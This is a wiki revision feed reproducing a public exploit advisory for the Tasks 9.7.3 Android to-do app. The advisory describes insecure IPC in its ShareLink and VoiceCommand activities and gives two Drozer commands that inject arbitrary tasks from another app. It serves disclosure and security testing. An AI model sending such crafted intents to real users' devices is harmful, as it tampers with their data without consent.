https://pwnwiki.com/index.php?action=history&feed=atom&title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E Tasks 9.7.3 本地權限提升漏洞 - Revision history 2026-04-10T18:50:04Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&diff=1748&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Tasks 9.7.3 - Insecure Permissions # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-..." 2021-04-20T03:11:56Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Tasks 9.7.3 - Insecure Permissions # Exploit Author: Lyhin&#039;s Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Tasks 9.7.3 - Insecure Permissions<br /> # Exploit Author: Lyhin's Lab<br /> # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/<br /> # Vendor Homepage: https://tasks.org/<br /> # Software Link: https://github.com/tasks/tasks<br /> # Version: 9.7.3<br /> # Tested on: Android 9<br /> <br /> Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. <br /> A malicious application has several ways of how to achieve that:<br /> <br /> 1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested &quot;task&quot; to the user's task list.<br /> <br /> 2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.<br /> <br /> We used the Drozer application to emulate malicious app activity. Please find the commands below.<br /> <br /> run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT &quot;Kill Mufasa&quot;<br /> run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT &quot;Visit https://lyhinslab.org&quot;<br /> &lt;/pre&gt;</div> Pwnwiki